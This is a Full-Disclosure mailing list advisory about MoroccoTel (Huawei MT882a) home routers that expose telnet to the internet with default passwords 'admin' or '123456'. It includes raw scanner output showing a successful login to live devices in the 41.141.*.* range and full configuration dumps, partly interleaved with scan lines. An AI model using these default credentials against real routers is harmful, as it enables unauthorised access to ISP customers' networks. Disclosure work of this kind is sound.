[Full-disclosure] MoroccoTel Box Default Open Telnet Password



Hi,

a "vulnerability" was identified on MoroccoTel Boxes:
a telnet server is running, open to the web, with a default password of
admin (or 123456)

This critical vulnerability can affect the entire network of a Country.

Solution: change the default password account or modify the default firmware

NB: a new firmware was released, introducing a cipher on the "PPOE
password" (one common, publicly available PPOE account is largely used)

Discovered by NETpeas research team, NETpeas CERT is trying to contact
the ISP

More details:

Password:
telnettry
41.141.*.* -> Response telnet02: ****
Copyright (c) 2001 - 2006 Huawei
MT882a>
***********************************************************
41.141.*.* -> TELNET PASSWORD FOUND: admin

MT882a> show all

RAS version: V100R001B022 MoroccoTel 2010/02/26
System ID: $5.0.152.1(RUE0.C2)3.11.2.151 20110602_V001 [Jun 02 2011
13:54:48]
romRasSize: 1217226
system up time: 2:45:45 (f2cc9 ticks)
bootbase version: VTC_SPI1.5| 2011/05/26


Hostname = MT882a
Message = <empty>
ip route mode = Yes
bridge mode = Yes
DHCP setting:
DHCP Mode = Server
Client IP Pool Starting Address = 192.168.1.2
Size of Client IP Pool = 64
Primary DNS Server = 8.8.8.8
Secondary DNS Server = 8.8.4.4
DHCP server leasetime = 86400
TCP/IP Setup:
IP Address = 192.168.1.1
IP Subnet Mask = 255.255.255.0
Rip Direction = None
Version = Rip-1
Multicast = IGMP-v2


RemoteNode = 0
Rem Node Name = ISP-0(ISP)
Encapsulation = PPPoE
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/35
IP Routing mode= Yes
Bridge mode = No
PPP Username = <snip>

PPP Password
41.141.*.* -> = *******
PPP Username_ext2 =
PPP Password_ext2 =
Service name =
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = Yes
Multicast = None
Default Route node = Yes

RemoteNode = 1
Rem Node Name = ISP-1
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel
41.141.1.9 -> Port 80 open
41.141.*.* -> active = Yes
VPI/VCI value = 0/35
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0

41.141.*.* -> IP address assignment type = Dynamic

41.141.*.* -> SUA = No
Multicast = None
Default Route node = No

RemoteNode = 2
Rem Node Name = ISP-2
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 3
Rem Node Name = ISP-3
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/32
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 4
Rem Node Name = ISP-4
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 8/81
IP Routing mode= No
Bridge mode = Yes
Remote IP
41.141.*.* -> Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 5
Rem Node Name = ISP-5
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/100
IP Routing mode= No
Bridge mode = Yes
Remote IP A
41.141.*.* -> ddr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
sMulticast = None

41.141.*.* -> yDefault Route node = No
s
RemoteNode = 6
aRem Node Name = ISP-6t
sEncapsulation = hRFC 1483

Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 1/39
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

RemoteNode = 7
Rem Node Name = ISP-7
Encapsulation = RFC 1483
Multiplexing = LLC-based
Channel active = Yes
VPI/VCI value = 0/16
IP Routing mode= No
Bridge mode = Yes
Remote IP Addr = 0.0.0.0
Remote IP Subnet Mask = 0.0.0.0
IP address assignment type = Dynamic
SUA = No
Multicast = None
Default Route node = No

MT882a>
RAS version : V100R001B022 MoroccoTel
romRasSize : 1217226
bootbase version : VTC_SPI1.5| 2011/05/26
Product Model : SmartAX

MAC Address : <snip-inclear>

Default Count
41.141.*.* -> ry Code : FF

Boot Module Debug Flag : 00

RomFile Version : 9F

RomFile Checksum : dceb

RAS F/W Checksum : 87b7

SNMP MIB level & OID : 050000000100000002000000030000000400000005

Main Feature Bits : 86

Other Feature Bits :
93 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 13 00 00 00
MT882a>
41.141.*.* -> e
41.141.*.* -> ther config
--------------- NDIS CONFIGURATION BLOCK ----------------
type=1 flags=0001
Board/Chassis:1 Lines/Board:1 Channels/Lines:2 Total Channel:2
task-id=8041f1f4 event-q=80458c2c(19) data-q=80458c70(1a) func-id=2
board-cfg=8042c8a4 line-cfg=8042c8bc chann-cfg=8042c8d0
board-pp (8042c8f0)
804273fc
line-pp (8042c8f4)
8042956c
chann-pp (8042c8f8)
804bf8a4 804bfe34
--------------- BOARD DISPLAY ---------------------------
ID slot# n-line n-chann status line-cfg chann-cfg
00 0 1 2 0001 8042c8bc 8042c8d0
--------------- LINE DISPLAY ---------------------------
ID line# board-id n-chann chann-cfg
00 1 00 2 8042c8d0
--------------- CHANNEL DISPLAY -------------------------
ID chan# line-id board-id address name
00 1 00 00 804bf8a4 enet0
01 2 00 00 804bfe34 enet1
MT882a>


--
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
Mobile: +212665346454
www.netpeas.com
---------------------------------------------
Stay updated on Security: www.vulnerabilitydatabase.com

"The computer security is an art form. It's the ultimate martial art."

Attachment: smime.p7s
Description: Signature cryptographique S/MIME

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/